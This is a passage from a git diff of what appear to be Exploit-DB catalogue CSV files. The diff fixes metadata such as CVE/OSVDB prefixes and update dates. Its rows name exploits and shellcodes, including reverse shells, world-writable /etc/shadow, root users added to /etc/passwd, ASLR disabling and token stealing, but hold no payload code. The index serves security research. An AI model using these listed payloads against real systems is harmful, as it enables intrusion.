Overflow (Metasploit)",2010-10-05,Metasploit,remote,windows,,2010-10-05,2017-10-05,1,CVE-2005-1323;OSVDB-15865,"Metasploit Framework (MSF)",,,, -43408,exploits/windows/remote/43408.py,"NetTransport 2.96L - Remote Buffer Overflow (DEP Bypass)",2017-12-29,"Aloyce J. Makalanga",remote,windows,,2017-12-29,2018-01-10,0,CVE-2017-17968,,,,http://www.exploit-db.comNXSetup_x86.zip, +43408,exploits/windows/remote/43408.py,"NetTransport 2.96L - Remote Buffer Overflow (DEP Bypass)",2017-12-29,"Aloyce J. Makalanga",remote,windows,,2017-12-29,2022-11-11,0,CVE-2017-17968,,,,http://www.exploit-db.comNXSetup_x86.zip, 16439,exploits/windows/remote/16439.rb,"NetTransport Download Manager 2.90.510 - Remote Buffer Overflow (Metasploit)",2010-08-25,Metasploit,remote,windows,,2010-08-25,2011-03-10,1,OSVDB-61435,"Metasploit Framework (MSF)",,,, 10911,exploits/windows/remote/10911.py,"NetTransport Download Manager 2.90.510 - Remote Overflow (SEH)",2010-01-02,Lincoln,remote,windows,,2010-01-01,2017-11-15,1,OSVDB-61435,,,,http://www.exploit-db.comNXSetup_Vista_x86_.zip, 19895,exploits/windows/remote/19895.txt,"NetWin DNews 5.3 Server - Remote Buffer Overflow",2000-03-01,Joey__,remote,windows,,2000-03-01,2012-07-22,1,OSVDB-13683;CVE-2000-0423,,,,,https://www.securityfocus.com/bid/1172/info diff --git a/files_shellcodes.csv b/files_shellcodes.csv index ccfe93585..51216d82f 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -199,13 +199,13 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd 36274,shellcodes/linux_mips/36274.c,"Linux/MIPS (Little Endian) - chmod(/etc/shadow 666) Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",,linux_mips,55,2015-03-05,2017-08-22,0,,,,,, 13300,shellcodes/linux_mips/13300.c,"Linux/MIPS (Little Endian) - execve(/bin/sh) Shellcode (56 bytes)",2005-11-09,core,,linux_mips,56,2005-11-08,2018-01-12,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-79.php 29436,shellcodes/linux_mips/29436.asm,"Linux/MIPS (Little Endian) - Reverse (192.168.1.177:31337/TCP) Shell (/bin/sh) Shellcode (200 bytes)",2013-11-04,"Jacob Holcomb",,linux_mips,200,2013-11-08,2016-09-12,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-860.php -27132,shellcodes/linux_mips/27132.txt,"Linux/MIPS (Little Endian) - system(telnetd -l /bin/sh) Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",,linux_mips,80,2013-07-27,2018-01-12,0,2013-4659;95778,,,,, +27132,shellcodes/linux_mips/27132.txt,"Linux/MIPS (Little Endian) - system(telnetd -l /bin/sh) Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",,linux_mips,80,2013-07-27,2018-01-12,0,CVE-2013-4659;OSVDB-95778,,,,, 18163,shellcodes/linux_mips/18163.c,"Linux/MIPS - Add Root User (rOOt/pwn3d) To /etc/passwd Shellcode (164 bytes)",2011-11-27,rigan,,linux_mips,164,2011-11-27,2018-01-17,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-793.php 35868,shellcodes/linux_mips/35868.c,"Linux/MIPS - execve(/bin/sh) Shellcode (36 bytes)",2015-01-22,Sanguine,,linux_mips,36,2015-02-03,2019-03-07,0,,,,http://www.exploit-db.com/screenshots/idlt36000/download-attachment.png,, 18162,shellcodes/linux_mips/18162.c,"Linux/MIPS - execve(/bin/sh) Shellcode (48 bytes)",2011-11-27,rigan,,linux_mips,48,2011-11-27,2011-11-27,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-792.php 17940,shellcodes/linux_mips/17940.c,"Linux/MIPS - execve(/bin/sh) Shellcode (52 bytes)",2011-10-07,entropy,,linux_mips,52,2011-10-07,2018-01-12,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-782.php 50751,shellcodes/linux_mips/50751.c,"Linux/MIPS - N32 MSB Reverse Shell Shellcode",2022-02-18,"Marco Ivaldi",,linux_mips,,2022-02-18,2022-02-18,0,,,,,, -18227,shellcodes/linux_mips/18227.c,"Linux/MIPS - reboot() Shellcode (32 bytes)",2011-12-10,rigan,,linux_mips,32,2011-12-10,2011-12-10,0,83189,,,,,http://shell-storm.org/shellcode/files/shellcode-795.php +18227,shellcodes/linux_mips/18227.c,"Linux/MIPS - reboot() Shellcode (32 bytes)",2011-12-10,rigan,,linux_mips,32,2011-12-10,2011-12-10,0,OSVDB-83189,,,,,http://shell-storm.org/shellcode/files/shellcode-795.php 18226,shellcodes/linux_mips/18226.c,"Linux/MIPS - Reverse (0x7a69/TCP) Shell Shellcode (168 bytes)",2011-12-10,rigan,,linux_mips,168,2011-12-10,2011-12-10,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-794.php 45287,shellcodes/linux_mips/45287.c,"Linux/MIPS64 - execve(/bin/sh) Shellcode (48 bytes)",2018-08-29,antonio,,linux_mips,,2018-08-29,2018-08-29,0,,,,,, 13304,shellcodes/linux_ppc/13304.c,"Linux/PPC - execve(/bin/sh) Shellcode (112 bytes)",2004-09-12,Palante,,linux_ppc,112,2004-09-11,,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-89.php @@ -461,7 +461,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd 46277,shellcodes/linux_x86/46277.c,"Linux/x86 - execve(/bin/sh) + RShift-1 Encoded Shellcode (29 bytes)",2019-01-29,"Joao Batista",,linux_x86,29,2019-01-29,2019-01-29,0,,,,,, 13447,shellcodes/linux_x86/13447.c,"Linux/x86 - execve(/bin/sh) + setreuid(12_12) Shellcode (50 bytes)",2004-09-12,anonymous,,linux_x86,50,2004-09-11,,1,,,,,, 42177,shellcodes/linux_x86/42177.c,"Linux/x86 - execve(/bin/sh) + setuid(0) + setgid(0) + XOR Encoded Shellcode (66 bytes)",2017-06-15,nullparasite,,linux_x86,66,2017-06-15,2017-07-04,0,,,,,, -34060,shellcodes/linux_x86/34060.c,"Linux/x86 - execve(/bin/sh) + Socket Re-Use Shellcode (50 bytes)",2014-07-14,ZadYree,,linux_x86,50,2014-07-22,2017-08-23,1,2014-4943;109277,,,,,http://shell-storm.org/shellcode/files/shellcode-881.php +34060,shellcodes/linux_x86/34060.c,"Linux/x86 - execve(/bin/sh) + Socket Re-Use Shellcode (50 bytes)",2014-07-14,ZadYree,,linux_x86,50,2014-07-22,2017-08-23,1,CVE-2014-4943;OSVDB-109277,,,,,http://shell-storm.org/shellcode/files/shellcode-881.php 13409,shellcodes/linux_x86/13409.c,"Linux/x86 - execve(/bin/sh) + Standard Opcode Array Payload Shellcode (21 bytes)",2005-09-15,c0ntex,,linux_x86,21,2005-09-14,2018-01-17,1,,,,,, 13412,shellcodes/linux_x86/13412.c,"Linux/x86 - execve(/bin/sh) + sysenter Opcode Array Payload Shellcode (23 bytes)",2005-09-04,BaCkSpAcE,,linux_x86,23,2005-09-03,,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-236.php 13413,shellcodes/linux_x86/13413.c,"Linux/x86 - execve(/bin/sh) + sysenter Opcode Array Payload Shellcode (27 bytes)",2005-08-25,amnesia,,linux_x86,27,2005-08-24,,1,,,,,, @@ -678,7 +678,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd 18294,shellcodes/linux_x86/18294.c,"Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + No Password + Polymorphic Shellcode",2011-12-31,pentesters.ir,,linux_x86,,2011-12-31,2018-01-17,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-798.php 13342,shellcodes/linux_x86/13342.c,"Linux/x86 - setuid(0) + setgid(0) + aslr_off (Disable ASLR Security) Shellcode (79 bytes)",2008-08-18,LiquidWorm,,linux_x86,79,2008-08-17,2018-01-16,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-222.php 13728,shellcodes/linux_x86/13728.c,"Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh) Shellcode (39 bytes)",2010-06-01,gunslinger_,,linux_x86,39,2010-05-31,2017-07-04,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-631.php -13378,shellcodes/linux_x86/13378.c,"Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh_ [/bin/sh_ NULL]) Shellcode (37 bytes)",2006-04-03,"Gotfault Security",,linux_x86,37,2006-04-02,2018-01-16,1,65252,,,,,http://shell-storm.org/shellcode/files/shellcode-251.php +13378,shellcodes/linux_x86/13378.c,"Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh_ [/bin/sh_ NULL]) Shellcode (37 bytes)",2006-04-03,"Gotfault Security",,linux_x86,37,2006-04-02,2018-01-16,1,OSVDB-65252,,,,,http://shell-storm.org/shellcode/files/shellcode-251.php 43652,shellcodes/linux_x86/43652.c,"Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh_[/bin/sh_NULL])) Shellcode (25 bytes)",2009-06-23,TheWorm,,linux_x86,33,2018-01-16,2018-01-16,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-473.php 43751,shellcodes/linux_x86/43751.asm,"Linux/x86 - shift-bit execve() Encoder Shellcode (114 bytes)",2009-01-01,"Shihao Song",,linux_x86,114,2018-01-18,2018-01-18,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-868.php 46801,shellcodes/linux_x86/46801.txt,"Linux/x86 - Shred File (test.txt) Shellcode (72 bytes)",2019-05-06,strider,,linux_x86,72,2019-05-06,2019-05-23,0,,,,,, @@ -1028,7 +1028,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd 48116,shellcodes/windows_x86/48116.c,"Windows/x86 - WinExec Calc.exe + Null-Free Shellcode (195 bytes)",2020-02-24,boku,,windows_x86,,2020-02-24,2020-03-23,0,,,,,, 50368,shellcodes/windows_x86/50368.c,"Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes)",2021-10-01,"Daniel Ortiz",,windows_x86,,2021-10-01,2021-10-29,0,,,,,, 39900,shellcodes/windows_x86/39900.c,"Windows/x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)",2016-06-07,"Roziul Hasan Khan Shifat",,windows_x86,184,2016-06-07,2016-09-05,0,,,,,, -14288,shellcodes/windows_x86/14288.asm,"Windows/x86 - Write-to-file ('pwned' ./f.txt) + Null-Free Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",,windows_x86,278,2010-07-09,2017-08-24,1,2010-0425,,,,,http://shell-storm.org/shellcode/files/shellcode-681.php +14288,shellcodes/windows_x86/14288.asm,"Windows/x86 - Write-to-file ('pwned' ./f.txt) + Null-Free Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",,windows_x86,278,2010-07-09,2017-08-24,1,CVE-2010-0425,,,,,http://shell-storm.org/shellcode/files/shellcode-681.php 41827,shellcodes/windows_x86-64/41827.asm,"Windows/x64 (10) - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",,windows_x86-64,45,2017-04-06,2017-04-06,0,,,,,, 45293,shellcodes/windows_x86-64/45293.c,"Windows/x64 (10) - WoW64 Egghunter (w00tw00t) Shellcode (50 bytes)",2018-08-29,n30m1nd,,windows_x86-64,50,2018-08-29,2018-09-08,0,,,,,, 37895,shellcodes/windows_x86-64/37895.asm,"Windows/x64 (2003) - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",,windows_x86-64,59,2015-08-20,2015-08-20,0,,,,,,